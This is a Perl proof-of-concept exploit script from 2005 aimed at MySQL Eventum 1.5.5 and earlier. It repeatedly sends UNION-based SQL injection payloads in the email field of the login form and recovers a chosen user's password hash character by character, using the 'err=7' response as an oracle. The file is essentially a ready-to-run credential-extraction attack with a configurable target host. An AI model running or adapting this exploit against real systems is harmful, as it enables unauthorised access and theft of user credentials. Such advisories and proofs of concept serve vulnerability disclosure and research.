#!/usr/bin/perl -w
use IO::Socket;
use strict;

print "#############################################\n";
print "# MySQL Eventum <= v1.5.5 SQL Injection PoC #\n";
print "# James Bercegay // gulftech.org // 7-28-05 #\n";
print "#############################################\n";

my $host = 'localhost';
my $path = '/eventum/login.php';
my $user = '2';
my $port = 80;
my $pass = '';

my @char = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

print "[*] Trying $host\n";

OUTER: for ( my $i = 1; $i < 33; $i++ ) 
{
	INNER: for ( my $j=0; $j < 16; $j++ )
    {
		my $used = $char[$j];
		my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $host\n";

		my $post  = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+MID(usr_password,$i,1)='$used'%2F*&passwd=dance&Submit=Login";
		my $send  = "POST $path HTTP/1.1\r\n";
		   $send .= "Host: $host\r\n";
		   $send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
		   $send .= "Connection: Keep-Alive\r\n";
		   $send .= "Content-type: application/x-www-form-urlencoded\r\n"; 
		   $send .= "Content-length: ".length($post)."\r\n\r\n";
		   $send .= "$post\r\n\r\n";
			
		print $sock $send;

		while ( my $line = <$sock> )
		{
			if ( $line =~ /(.*)err=7(.*)/is )
			{
				$pass .= $used;
				print "[+] Char $i is $used\n";
				last INNER;
			} 
			#/if
		}
		#/while

		close($sock);	
	}
	#/for INNER

	if ( length($pass) < 1 ) 
	{
		print "[!] Host not vulnerable!";
		exit;
	}
}
#/for OUTER

print "[+] Pass hash is $pass\n";
exit;